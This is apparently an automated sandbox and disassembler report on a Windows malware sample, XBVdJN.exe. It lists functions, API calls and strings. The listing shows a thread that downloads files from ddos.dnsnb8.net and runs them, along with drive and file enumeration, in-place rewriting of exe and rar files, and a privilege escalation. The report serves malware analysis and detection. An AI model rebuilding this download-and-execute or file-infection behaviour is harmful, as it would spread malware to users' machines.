Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: c28782c76d0151406301db8eb819f0bcfa0fda903783e04df2321965597381b4
Instruction ID: 36a9edbd0ef466ab30e62cd0397264d21bed5f24fd678e045e9ef842dd68c828
Opcode Fuzzy Hash: c28782c76d0151406301db8eb819f0bcfa0fda903783e04df2321965597381b4
Instruction Fuzzy Hash: 2C4186B240434AAFD720DFA0DC89DDB77EDEB84315F08482AF545D3211E634D69887A6

Function 00611718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 00611729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0061174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0061177C
__aulldiv.LIBCMT ref: 00611796
__aulldiv.LIBCMT ref: 006117A8

Strings

SOFTWARE\GTplus, xrefs: 00611742, 0061176B
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 00611722
Time, xrefs: 0061173D, 00611766

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-3754639035
Opcode ID: 53d6569b406a5c48a8f7f71cef2960f4751b77c2b8bd2883aedb7160c65e90b9
Instruction ID: 6bc131a6a4fe29481fbab03d04caf538678dbf6b995c0e8f1b879f62585c7812
Opcode Fuzzy Hash: 53d6569b406a5c48a8f7f71cef2960f4751b77c2b8bd2883aedb7160c65e90b9
Instruction Fuzzy Hash: 9E115B75A00219BBDF109B94CC86FEF7BBEEB45B14F148115FA01F6380D6719A84C764

Function 00616076 Relevance: 11.1, APIs: 7, Instructions: 617
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 006160BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006160DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00616189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006161A5

Memory Dump Source

Source File: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b35c354bb450e97f0d3d56b74ab2f857cdc5695473b555c91f8392088d510090
Instruction ID: aef3a31cf8084b42ac526c669f8e6e8d1684bbabae2ff8c311d92ddf873233dd
Opcode Fuzzy Hash: b35c354bb450e97f0d3d56b74ab2f857cdc5695473b555c91f8392088d510090
Instruction Fuzzy Hash: 951245B65087849FDB328F64CC45BEA3BB6EF02310F1C45AEF8858B293D674A981C755

Function 00611E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,006132B0,00000164,00612986,?), ref: 00611EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00611ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00611EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00611F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00611F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0061201E
memset.MSVCRT ref: 006120D8
memset.MSVCRT ref: 006120EA
memcpy.MSVCRT ref: 0061222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00612238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0061224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122DD
WriteFile.KERNEL32(000000FF,00614008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0061230D
FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00612322
UnmapViewOfFile.KERNEL32(?,?,006132B0,00000164,00612986,?), ref: 00612340
FindCloseChangeNotification.KERNEL32(?,?,006132B0,00000164,00612986,?), ref: 0061234E
CloseHandle.KERNEL32(000000FF,?,006132B0,00000164,00612986,?), ref: 00612359

Strings

C@a, xrefs: 0061229E
<@a, xrefs: 00612290
5@a, xrefs: 00612282
m@a, xrefs: 00611E8F, 0061225A
.@a, xrefs: 00612274

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@a$5@a$<@a$C@a$m@a
API String ID: 3349749541-1651383129
Opcode ID: 26bde03b186d386a4bf17692afa123f40b2a73d85586f3756303b0ea8b6f58fd
Instruction ID: 60dbcdbf8ec51ff9aee45437fd1cecdc0a1dbe02c7ea0e803346bb045ac9bd97
Opcode Fuzzy Hash: 26bde03b186d386a4bf17692afa123f40b2a73d85586f3756303b0ea8b6f58fd
Instruction Fuzzy Hash: F9F16E71900209EFCB20DFA4DC91AEDBBB6FF08314F18852AE519AB651D734AE91CF54

Function 00611973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 00611992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
Sleep.KERNEL32(00000064), ref: 006119C6
wsprintfA.USER32 ref: 006119EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00611A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00611A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00611A90
DeleteFileA.KERNEL32(?), ref: 00611AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00611AC1

Strings

%s%.8X.data, xrefs: 006119E6
\Na`Na, xrefs: 00611980
C:\Users\user\AppData\Local\Temp\, xrefs: 006119DB
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 0061197C

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$\Na`Na
API String ID: 2523042076-147115663
Opcode ID: 723bc10770dbc7640d11d3b3a95c653e58e9c0e0595209fa176e3abfed372a8d
Instruction ID: c67cb0a00aa23ca64eefc02f62e4814ed13199dc0dcdaf5fa232a6df2ff84f2b
Opcode Fuzzy Hash: 723bc10770dbc7640d11d3b3a95c653e58e9c0e0595209fa176e3abfed372a8d
Instruction Fuzzy Hash: AF515271901259EFCF109F94CC84AEEBFBAEF0A355F184569F616EA290D3309E90CB50

Function 006128B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 006128D3
wsprintfA.USER32 ref: 006128F7
memset.MSVCRT ref: 00612925
wsprintfA.USER32 ref: 00612940

Part of subcall function 006129E2: memset.MSVCRT ref: 00612A02
Part of subcall function 006129E2: wsprintfA.USER32 ref: 00612A1A
Part of subcall function 006129E2: memset.MSVCRT ref: 00612A44
Part of subcall function 006129E2: lstrlen.KERNEL32(?), ref: 00612A54
Part of subcall function 006129E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00612A6C
Part of subcall function 006129E2: strrchr.MSVCRT ref: 00612A7C
Part of subcall function 006129E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00612A9F
Part of subcall function 006129E2: lstrlen.KERNEL32(Documents and Settings), ref: 00612AAE
Part of subcall function 006129E2: memset.MSVCRT ref: 00612AC6
Part of subcall function 006129E2: memset.MSVCRT ref: 00612ADA
Part of subcall function 006129E2: FindFirstFileA.KERNEL32(?,?), ref: 00612AEF
Part of subcall function 006129E2: memset.MSVCRT ref: 00612B13

strrchr.MSVCRT ref: 00612959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00612974

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 006129B3
exe, xrefs: 0061296D
%s\, xrefs: 0061293A
rar, xrefs: 00612988
%s%s, xrefs: 006128F1

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1791786966
Opcode ID: b9da12d2179268b1e9b2c205e1aed13a02f8a5df0e69e32eb4baba4201895df4
Instruction ID: 6532814002a54596f2e8f6136d3fece380a265a67b8f33b3481bffbe38b7bad2
Opcode Fuzzy Hash: b9da12d2179268b1e9b2c205e1aed13a02f8a5df0e69e32eb4baba4201895df4
Instruction Fuzzy Hash: 5B31EA7194031E7BDB20A76ADC95FCA37AE9F14310F0D0857F545A3280E6B4DBD48BA0

Function 00611099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
Part of subcall function 0061185B: rand.MSVCRT ref: 00611894

WinExec.KERNEL32(?,00000005), ref: 006110F1
lstrlen.KERNEL32(00614748), ref: 006110FA
wsprintfA.USER32 ref: 0061112A
wsprintfA.USER32 ref: 00611143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0061115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00611169
Sleep.KERNEL32 ref: 00611179

Strings

http://%s:%d/%s/%s, xrefs: 006110C2, 00611141
%s%.8X.exe, xrefs: 00611124
HGa, xrefs: 0061112C
C:\Users\user\AppData\Local\Temp\, xrefs: 00611119
cj/, xrefs: 00611135
ddos.dnsnb8.net, xrefs: 006110C8, 006110CF, 00611140, 00611168

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGa$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-3431217257
Opcode ID: dd811f5023a791330159270864cd53e628209eaa8919bc64cd325d1460f8777b
Instruction ID: 4955d13efe3e3bd299cfcc4b9f6dcdb8bf949d15c8c180b90fe6533efed0e477
Opcode Fuzzy Hash: dd811f5023a791330159270864cd53e628209eaa8919bc64cd325d1460f8777b
Instruction Fuzzy Hash: C421A175900218BACB20DBA0DC45BEEBBBFAB16316F1D8096E601A7150DB745BC4CFA0

Function 00611638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0061164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0061165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,00000104), ref: 0061166E
CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 006116AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006116BD

Part of subcall function 0061139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006113BC
Part of subcall function 0061139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006113DA
Part of subcall function 0061139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00611448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006116E5

Strings

Documents and Settings, xrefs: 00611696
C:\Windows\system32, xrefs: 00611656
C:\Users\user\AppData\Local\Temp\, xrefs: 00611644
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 00611662, 00611667, 006116DD

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-1332623409
Opcode ID: 63a3fb7ee5a35819c12fa68dfce180456dedf1e0bda332033de7eb1bb3e77268
Instruction ID: c1dcd9a03b00e10779a93785b5febaa4e8d71cddc91972bc84d479ab7e37c2ab
Opcode Fuzzy Hash: 63a3fb7ee5a35819c12fa68dfce180456dedf1e0bda332033de7eb1bb3e77268
Instruction Fuzzy Hash: BD11D6715001247BCF205BA0AD49EDB3EAFEF0B362F0D5016F30A992A0CA7145C0D7A1

Function 00611000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGa,http://%s:%d/%s/%s,006110E8,?), ref: 00611018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 00611029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00611038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0061104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00611075
CloseHandle.KERNEL32(?), ref: 0061108B
CloseHandle.KERNEL32(00000000), ref: 0061108E

Strings

http://%s:%d/%s/%s, xrefs: 00611000
HGa, xrefs: 00611001
ddos.dnsnb8.net, xrefs: 00611026

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HGa$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3642003181
Opcode ID: 12b195d546a3f3772b7636684453fd69e175231f8f602ea36ecce1c467889698
Instruction ID: f2d3be2e2a63dfecc4ec3e3c9782bfd0088d76e2a1ea5dc42383253195b4c8fd
Opcode Fuzzy Hash: 12b195d546a3f3772b7636684453fd69e175231f8f602ea36ecce1c467889698
Instruction Fuzzy Hash: 98019B7150035CBFE7305F609C88EAB7BEEDB4879AF09452AF345A6290DA705E848B70

Function 00612B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00612BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00612BB4
GetDriveTypeA.KERNEL32(?), ref: 00612BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00612BEE
lstrlen.KERNEL32(?), ref: 00612BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00612C16
CreateThread.KERNEL32(00000000,00000000,00612845,00000000,00000000,00000000), ref: 00612C3A

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: f7e84ee5a88acd26e701878d9f84075548c5d70e74a725a1a5055a977728831a
Instruction ID: f267273a0d1b7a750d8bf8fbafc0be1d5d27e687dc2846714e68709378deae18
Opcode Fuzzy Hash: f7e84ee5a88acd26e701878d9f84075548c5d70e74a725a1a5055a977728831a
Instruction Fuzzy Hash: 8421D5B180015EAFEB209F64AC84DEF7BAFFB08349B1D012AF94293251D7208D56CB60

Function 00612C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00612C57

Part of subcall function 00611973: PathFileExistsA.SHLWAPI(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 00611992
Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
Part of subcall function 00611973: Sleep.KERNEL32(00000064), ref: 006119C6
Part of subcall function 00611973: wsprintfA.USER32 ref: 006119EC
Part of subcall function 00611973: CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
Part of subcall function 00611973: GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
Part of subcall function 00611973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00611A46
Part of subcall function 00611973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00611A65

CreateThread.KERNEL32(00000000,00000000,00612B8C,00000000,00000000,00000000), ref: 00612C99
WaitForMultipleObjects.KERNEL32(00000001,006116BA,00000001,000000FF,?,006116BA,00000000), ref: 00612CAC
VirtualFree.KERNEL32(01070000,00000000,00008000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,00614E5C,00614E60,?,006116BA,00000000), ref: 00612CC2

Strings

C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 00612C69

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe
API String ID: 2042498389-1113178309
Opcode ID: 56fa2a4f66104d298270385df844c5d1f88bb007cc831c8059d5b28338dbec65
Instruction ID: e32badba721ac0a266cbaf12613a00ea936d93f0ddaab6ea5afafd462113c682
Opcode Fuzzy Hash: 56fa2a4f66104d298270385df844c5d1f88bb007cc831c8059d5b28338dbec65
Instruction Fuzzy Hash: DF01D4716412217BD75097949C1AEDF7FAEEF01B60F088115B605DA2C1D9A09990C7E0

Function 006114E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00611504
VirtualQuery.KERNEL32(006114E1,?,0000001C), ref: 00611525
ExitProcess.KERNEL32 ref: 0061157A

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 45bc568c5c4ad3140564c360a3f50f2ba585b756154b6dfa8a05430d767da7da
Instruction ID: a2fd11c28bec24ae4142ac9c0612d3fd795b0936b92c25b69937af3d7d429ef1
Opcode Fuzzy Hash: 45bc568c5c4ad3140564c360a3f50f2ba585b756154b6dfa8a05430d767da7da
Instruction Fuzzy Hash: 36115EB1D01215DFCF10DFA5B8856FD77BBEB85711B18A02BF602DB250E6348981EB50

Function 00611915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00611933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00611947

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 323f1d4380aa0f9c77b46b170d48acb819f83beca1e49e3ab9416b907dd605e7
Instruction ID: 6573639a602018b0c992fb00b018dde77bb7bfe688e7d3fb707ba593f18ce745
Opcode Fuzzy Hash: 323f1d4380aa0f9c77b46b170d48acb819f83beca1e49e3ab9416b907dd605e7
Instruction Fuzzy Hash: BDF04432200219ABDB209E26DC04AE777EEAB55361F08893AF626D9150E730D685CBF0

Function 00616159 Relevance: 2.6, APIs: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006160DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00616189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006161A5

Memory Dump Source

Source File: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
